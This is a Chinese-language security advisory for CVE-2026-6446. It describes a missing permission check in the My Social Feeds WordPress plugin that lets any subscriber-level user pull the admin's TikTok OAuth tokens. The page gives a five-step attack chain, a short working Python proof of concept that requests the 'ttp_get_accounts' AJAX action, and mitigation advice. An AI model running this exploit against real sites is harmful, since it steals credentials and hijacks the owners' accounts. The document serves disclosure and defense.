IPBUF安全漏洞报告
English
CVE-2026-6446 CVSS 5.4 中危

CVE-2026-6446 WordPress插件敏感信息泄露漏洞

披露日期: 2026-05-02
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-6446
漏洞类型
敏感信息泄露
CVSS评分
5.4 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
My Social Feeds – Social Feeds Embedder Plugin

相关标签

WordPress敏感信息泄露CVE-2026-6446My Social FeedsOAuth权限绕过

漏洞概述

WordPress的My Social Feeds插件存在敏感信息泄露漏洞。该漏洞影响1.0.4及以下版本。由于`get_accounts()`函数在处理AJAX请求时缺少权限检查和nonce验证,导致任何经过身份验证的攻击者(仅需订阅者权限)均可访问。攻击者可利用此漏洞获取管理员绑定的TikTok账号OAuth凭证(如access_token和refresh_token),进而冒充站点所有者与TikTok API交互,造成严重的数据泄露风险。

技术细节

该漏洞的核心在于WordPress插件对AJAX请求的处理不当。在受影响版本的`TiktokAPI.php`文件中,`get_accounts()`函数被注册为`ttp_get_accounts` AJAX动作的处理函数。正常情况下,涉及敏感数据提取的函数应当验证当前用户是否具有管理权限(如`manage_options`能力)以及请求的合法性(Nonce验证)。然而,该插件未实施任何此类安全措施。当攻击者向`/wp-admin/admin-ajax.php`发送带有`action=ttp_get_accounts`的POST请求时,只要他们拥有有效的WordPress登录Cookie(即便是最低级别的订阅者账户),服务器便会执行`get_accounts()`。该函数直接调用`get_option('ttp_tiktok_accounts')`并返回JSON格式的数据,其中包含了管理员配置的TikTok账户的完整OAuth令牌。由于这些令牌用于授权与TikTok API的交互,泄露后攻击者可直接接管关联的TikTok账户权限,发布内容或窃取数据。

攻击链分析

STEP 1
1. 获取访问权限
攻击者通过弱口令爆破、钓鱼或利用现有账户,获取一个低权限(如订阅者Subscriber)的WordPress账户凭证。
STEP 2
2. 发送恶意请求
攻击者使用获取的凭证登录,并向`/wp-admin/admin-ajax.php`发送POST请求,参数为`action=ttp_get_accounts`。
STEP 3
3. 触发信息泄露
服务器端`get_accounts()`函数在未验证权限的情况下执行,从数据库中读取`ttp_tiktok_accounts`选项内容。
STEP 4
4. 接收敏感数据
服务器返回包含TikTok OAuth access_token和refresh_token的JSON数据给攻击者。
STEP 5
5. 利用凭证
攻击者使用窃取的令牌冒充站点管理员与TikTok API交互,进行数据窃取或恶意操作。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Exploit Title: My Social Feeds - Sensitive Information Exposure # CVE: CVE-2026-6446 # Description: Retrieves TikTok OAuth tokens due to missing authorization checks on the 'ttp_get_accounts' AJAX action. target_url = "http://example.com/wp-admin/admin-ajax.php" # Use valid session cookies from a logged-in user (Subscriber level or higher) cookies = { "wordpress_logged_in_...": "valid_cookie_value_here" } payload = { "action": "ttp_get_accounts" } try: response = requests.post(target_url, data=payload, cookies=cookies) if response.status_code == 200: print("[+] Exploit Successful!") print("[+] Leaked TikTok Credentials:") print(response.text) else: print("[-] Request failed with status code:", response.status_code) except Exception as e: print(f"[-] An error occurred: {e}")

影响范围

My Social Feeds – Social Feeds Embedder <= 1.0.4

防御指南

临时缓解措施
如果无法立即升级插件,建议暂时禁用或卸载该插件以防止数据泄露。同时,建议管理员检查WordPress用户列表,移除不可信的低权限用户,并在TikTok开发者后台重置相关的API密钥和访问令牌。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表